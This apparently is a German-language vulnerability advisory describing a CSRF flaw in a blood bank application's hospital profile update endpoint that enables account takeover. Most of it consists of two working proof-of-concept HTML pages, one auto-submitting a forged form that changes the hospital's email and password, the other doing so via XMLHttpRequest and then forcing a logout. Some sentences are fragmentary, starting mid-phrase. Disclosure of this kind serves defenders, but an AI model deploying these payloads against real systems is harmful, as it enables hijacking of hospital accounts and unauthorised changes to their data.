
Ein CSRF-POC zur Aktualisierung des Profils eines Krankenhauses, der zu einem Account-Takeover führt.
/file/updateprofile.phpAm Endpunkt /file/updateprofile.php besteht eine CSRF-Schwachstelle, die es einem entfernten Benutzer ermöglicht, die Benutzerdaten eines Krankenhauses zu aktualisieren. Dies kann zu einer Kontokompromittierung (Account Takeover) führen, da der Angreifer sämtliche Informationen von der E-Mail bis zum Passwort aktualisieren kann, was die Wahrscheinlichkeit einer Kontokompromittierung effektiv erhöht.
Eine erfolgreiche Ausnutzung kann zu unbefugten Aktionen, z.B. Löschung von Daten, im Namen des Opfers führen. Darüber hinaus kann dies durch den Besuch bösartiger Websites mit dem Payload ausgenutzt werden.
Im Folgenden finden Sie ein Beispiel für einen CSRF-PoC-Angriff, der die Profildaten eines angemeldeten Krankenhauskontos aktualisiert. Hosten Sie die Datei auf einer vom Angreifer kontrollierten Domäne; in meinem Fall habe ich localhost verwendet:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF PoC with Logout Redirect</title>
</head>
<body>
<h2>CSRF Proof of Concept with Chained Logout</h2>
<!-- Form to exploit CSRF vulnerability for updating profile -->
<form id="csrfForm" action="http://localhost.local/bloodbank/file/updateprofile.php" method="POST">
<input type="hidden" name="hname" value="parirenyatwa">
<input type="hidden" name="hemail" value="[email protected]">
<input type="hidden" name="hpassword" value="pari1234">
<input type="hidden" name="hphone" value="0777054000">
<input type="hidden" name="hcity" value="harare">
<input type="hidden" name="update" value="Update">
</form>
<script>
// Submit the CSRF form to update profile
document.getElementById("csrfForm").submit();
</script>
</body>
</html>
logout CSRF erzwingt, wodurch ein Account Takeover erreicht wird.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF PoC with XMLHttpRequest</title>
</head>
<body>
<h2>CSRF Proof of Concept with XMLHttpRequest and Redirect</h2>
<script>
// Define the target URLs for the CSRF attack
const updateUrl = "http://localhost.local/bloodbank/file/updateprofile.php";
const logoutUrl = "http://localhost.local/bloodbank/logout.php";
// Data for the profile update CSRF request
const updateData = "hname=parirenyatwa&hemail=pari%40hospital.co.zw&hpassword=pari1234&hphone=0777054000&hcity=harare&update=Update";
// Function to send the XMLHttpRequest
function sendCSRFUpdate() {
const xhr = new XMLHttpRequest();
xhr.open("POST", updateUrl, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
// When the request is complete, redirect to the logout page
xhr.onload = function() {
if (xhr.status === 200) {
console.log("Profile update CSRF request completed");
// Redirect to logout URL to log the victim out
window.location.href = logoutUrl;
} else {
console.error("Profile update failed with status:", xhr.status);
}
};
// Send the request with the update data
xhr.send(updateData);
}
// Trigger the CSRF attack by sending the update request
sendCSRFUpdate();
</script>
</body>
</html>
csrf tokens in Ihre Anfragen ein. Vermeiden Sie außerdem, dass GET-Anfragen zustandsändernde Aktionen ausführen.